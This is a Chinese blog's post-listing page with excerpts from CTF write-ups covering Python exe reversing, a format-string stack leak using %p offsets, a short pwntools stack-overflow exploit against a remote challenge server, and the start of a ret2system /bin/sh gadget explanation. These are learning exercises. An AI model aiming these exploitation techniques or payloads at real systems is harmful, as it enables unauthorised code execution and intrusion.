摘要: 这道题给了exe然后是python逆向,因为只有py文件我们才可以读的懂的源码,我的思路就是把exe变成pyc文件再在线改成py。 https://www.jb51.net/article/231188.htm 附上得到pyc文件的链接 https://github.com/countercept/ 阅读全文
posted @ 2022-03-30 21:51 REPWNER 阅读(10) 评论(0) 推荐(0)
摘要: 格式化字符串输出漏洞,原理就是当printf(%p),这么用时,没有参数,就会输出栈上的东西,这次flag在栈上,然后在终端里输入%10$ %11$p 等等就可以得到16进制,转字符串就对了,10 11等等是在栈上的偏移量。 阅读全文
posted @ 2022-03-30 21:36 REPWNER 阅读(5) 评论(0) 推荐(0)
摘要: 简单栈溢出 from pwn import * io=remote('121.40.181.50',10001) payload="a"*24+ p64(0x4005f6) io.sendline(payload) io.interactive() 阅读全文
posted @ 2022-03-30 21:29 REPWNER 阅读(5) 评论(0) 推荐(0)
摘要: PWN题真的恶心。这里面给了system函数,但是字符串是date,没有/bin/sh,所以需要手动输入。 这里第一个输入就把/bin/sh输入进去 地址在这里。然后去找gadget, **x64要执行system("/bin/sh")的常见方法就是把rdi寄存器赋为"/bin/sh"的地址 然后调 阅读全文
posted @ 2022-03-30 21:24 REPWNER 阅读(4) 评论(0) 推荐(0)